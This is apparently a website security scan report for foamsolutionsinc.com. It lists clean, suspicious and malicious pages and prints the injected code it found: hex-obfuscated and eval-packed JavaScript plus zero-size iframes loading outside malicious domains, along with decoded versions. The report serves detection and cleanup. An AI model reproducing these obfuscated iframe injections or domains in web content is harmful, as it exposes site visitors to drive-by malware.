Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=foamsolutionsinc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://foamsolutionsinc.com/ | 200 OK Content-Length: 11365 Content-Type: text/html | clean |
http://foamsolutionsinc.com/terms.html | 200 OK Content-Length: 15728 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/something?new'></iframe></div> Antivirus reports:
| ||
http://foamsolutionsinc.com/private.html | 200 OK Content-Length: 17068 Content-Type: text/html | malicious |
Page code contains blacklisted domain: blog.ponosmechty.esy.es <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>FoamSoulutions - Privacy Policy</title> <link href="css/foamsolutions.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" ...[4354 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> Malicious iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php This URL is marked by Google as suspicious <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://foamsolutionsinc.com/index.html | 200 OK Content-Length: 11365 Content-Type: text/html | clean |
http://foamsolutionsinc.com/aboutus.html | 200 OK Content-Length: 10528 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _0xec39=["\x3C\x73\x74\x79\x6C\x65\x3E\x2E\x61\x64\x73\x20\x7B\x70\x6F\x73\x69\x74\x69\x6F\x6E\x3A\x61\x62\x73\x6F\x6C\x75\x74\x65\x3B\x20\x6C\x65\x66\x74\x3A\x2D\x31\x35\x30\x30\x70\x78\x3B\x20\x74\x6F\x70\x3A\x2D\x31\x30\x30\x30\x70\x78\x7D\x3C\x2F\x73\x74\x79\x6C\x65\x3E","\x77\x72\x69\x74\x65","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x27\x61\x64\x73\x27\x3E\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x76\x63\x68\x32\x31\x30\x31\x2E\x69\x6E\x2F\x3F\x74\x72\x66\x27\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E\x3C\x2F\x64\x69\x76\x3E"];document[_0xec39[1]](_0xec39[0]);document[_0xec39[1]](_0xec39[2]); Decoded script: <style>.ads {position:absolute; left:-1500px; top:-1000px}</style><div class='ads'><iframe src='http://vch2101.in/?trf'></iframe></div> Antivirus reports:
| ||
http://foamsolutionsinc.com/contactus.html | 200 OK Content-Length: 11277 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/flooring.html | 200 OK Content-Length: 11922 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/footwear.html | 200 OK Content-Length: 13436 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/footcare.html | 200 OK Content-Length: 15565 Content-Type: text/html | malicious |
Page code contains blacklisted domain: blog.ponosmechty.esy.es <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>FoamSoulutions - Footcare</title> <link href="css/foamsolutions.css" rel="stylesheet" type="text/css" /> <script type="text/javascript">...[4347 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php This URL is marked by Google as suspicious <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/bedding.html | 200 OK Content-Length: 14846 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('8 c="C+/=";8 1="x==";8 5="";8 j,k,d,e,b,7,a="";8 i=0;8 v=/[^A-q-p-9\\+\\/\\=]/g;1=1.t(/[^A-q-p-9\\+\\/\\=]/g,"");s{e=c.f(1. ...[617 bytes skipped]... Decoded script: var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var hgRk="PGlmcmFtZSBzcmM9Imh0dHA6Ly9kaXJlY3QtY29ubmVjdC5ydSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbWVib3JkZXI9IjAiPjwvaWZyYW1lPg==";var FXnn="";var JGwu,llw4,KsGT,Pgmb,fWOI,apZG,c11A="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;hgRk=hgRk.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{Pgmb=k0e0y0S.indexOf(hgRk.charAt(i++));fWOI=k0e0y0S.indexOf(hgRk.charAt(i++));apZG=k0e0y0S.indexOf(h ...[1372 bytes skipped]... Antivirus reports:
| ||
http://foamsolutionsinc.com/bedding2.html | 200 OK Content-Length: 15392 Content-Type: text/html | malicious |
Page code contains blacklisted domain: blog.ponosmechty.esy.es <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>FoamSoulutions - Bedding</title> <link href="css/foamsolutions.css" rel="stylesheet" type="text/css" /> <script type="text/javascript"> ...[4379 bytes skipped]... Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> Malicious iFrame found. size: 0x0 src: http://blog.ponosmechty.esy.es/file/otk.php This URL is marked by Google as suspicious <iframe src="http://blog.ponosmechty.esy.es/file/otk.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/bedding3.html | 200 OK Content-Length: 15066 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://2gesichter.com/ok.php <iframe src="http://2gesichter.com/ok.php" width="0" height="0"> | ||
http://foamsolutionsinc.com/js/prototype.js | 200 OK Content-Length: 163312 Content-Type: application/javascript | clean |
http://foamsolutionsinc.com/js/scriptaculous.js?load=effects,builder | 200 OK Content-Length: 2931 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: foamsolutionsinc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 08:48:27 GMT
Accept-Ranges: bytes
Content-Type: text/html
Last-Modified: Tue, 21 Oct 2014 16:03:43 GMT
Set-Cookie: TS0194eee0=01e93bdf0f9d46791c5b2a1ebad88e9842b0f17478e3c73f3dd802ab6155b363ff3be05a2c; Path=/
GET / HTTP/1.1
Host: foamsolutionsinc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 10 Jan 2015 08:48:27 GMT
Accept-Ranges: bytes
Content-Type: text/html
Last-Modified: Tue, 21 Oct 2014 16:03:43 GMT
Set-Cookie: TS0194eee0=01e93bdf0f9d46791c5b2a1ebad88e9842b0f17478e3c73f3dd802ab6155b363ff3be05a2c; Path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: foamsolutionsinc.com
Referer: http://www.google.com/search?q=foamsolutionsinc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: foamsolutionsinc.com
Referer: http://www.google.com/search?q=foamsolutionsinc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.